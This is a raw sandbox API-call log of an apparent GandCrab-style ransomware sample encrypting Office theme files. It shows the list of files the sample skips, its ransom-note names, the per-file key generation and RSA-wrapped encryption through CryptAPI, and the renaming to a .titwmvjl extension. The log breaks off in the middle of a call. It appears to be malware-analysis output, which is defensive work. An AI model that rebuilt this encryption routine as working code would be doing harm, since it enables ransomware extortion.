lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="desktop.ini") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="autorun.inf") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="ntuser.dat") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="iconcache.db") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="bootsect.bak") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="boot.ini") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="thumbs.db") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="ntldr") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.192] lstrcmpiW (lpString1="TM03457503[[fn=Quotable]].thmx", lpString2="Bootfont.bin") returned 1 [0075.192] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx") returned 132 [0075.192] lstrlenW (lpString=".thmx") returned 5 [0075.192] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.193] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.193] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.193] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.193] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.194] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.194] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.200] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.200] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.201] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.201] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.202] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.202] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.202] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.202] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.202] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.202] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.202] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.202] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.203] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.203] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.203] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.203] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.203] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.203] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.203] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.204] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0075.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.204] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.205] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.205] GetLastError () returned 0x0 [0075.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.205] CryptDestroyKey (hKey=0x5037b8) returned 1 [0075.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.205] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.206] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.206] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0075.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.207] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.207] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.207] GetLastError () returned 0x0 [0075.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.207] CryptDestroyKey (hKey=0x503738) returned 1 [0075.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.208] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.208] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.208] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.208] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0xec122, lpOverlapped=0x0) returned 1 [0075.256] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff13ede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.256] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xec122, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0xec122, lpOverlapped=0x0) returned 1 [0075.263] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.263] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.265] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.268] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.272] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.272] CloseHandle (hObject=0x2ec) returned 1 [0075.294] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.296] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.296] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.296] lstrcmpW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2=".") returned 1 [0075.296] lstrcmpW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="..") returned 1 [0075.296] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457510[[fn=Savon]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx" [0075.296] lstrlenW (lpString=".titwmvjl") returned 9 [0075.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0075.296] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.296] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx.titwmvjl") returned 138 [0075.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0075.296] lstrlenW (lpString=".thmx") returned 5 [0075.296] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.297] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.297] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.297] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0075.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="desktop.ini") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="autorun.inf") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="ntuser.dat") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="iconcache.db") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="bootsect.bak") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="boot.ini") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="ntuser.dat.log") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="thumbs.db") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0075.297] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="ntldr") returned 1 [0075.298] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="NTDETECT.COM") returned 1 [0075.298] lstrcmpiW (lpString1="TM03457510[[fn=Savon]].thmx", lpString2="Bootfont.bin") returned 1 [0075.298] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx") returned 129 [0075.298] lstrlenW (lpString=".thmx") returned 5 [0075.298] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.298] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0075.298] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.298] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.298] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0075.299] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.299] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0075.306] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.306] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.307] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.307] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.307] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.307] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0075.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.307] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.307] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.308] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0075.308] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0075.308] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0075.308] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0075.309] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0075.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.309] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.309] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.309] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.310] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503238) returned 1 [0075.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.310] CryptGetKeyParam (in: hKey=0x503238, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.310] CryptEncrypt (in: hKey=0x503238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.310] GetLastError () returned 0x0 [0075.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.310] CryptDestroyKey (hKey=0x503238) returned 1 [0075.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.310] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.311] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0075.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.311] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5031f8) returned 1 [0075.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.311] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0075.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.312] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0075.312] GetLastError () returned 0x0 [0075.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.312] CryptDestroyKey (hKey=0x5031f8) returned 1 [0075.312] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0075.312] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0075.312] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0075.312] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0075.313] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0075.352] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.352] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0075.361] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.361] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0075.363] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.367] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.371] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.371] CloseHandle (hObject=0x2ec) returned 1 [0075.430] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0075.430] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.431] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0075.431] lstrcmpW (lpString1="TM03457515[[fn=View]].thmx", lpString2=".") returned 1 [0075.431] lstrcmpW (lpString1="TM03457515[[fn=View]].thmx", lpString2="..") returned 1 [0075.431] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457515[[fn=View]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx" [0075.431] lstrlenW (lpString=".titwmvjl") returned 9 [0075.431] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0075.431] VirtualAlloc (lpAddress=0x0, dwSize=0x140, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0075.431] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx.titwmvjl") returned 137 [0075.431] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0075.431] lstrlenW (lpString=".thmx") returned 5 [0075.431] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0075.431] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0075.431] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0075.431] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0075.432] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0075.432] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx") returned 128 [0075.432] lstrcmpiW 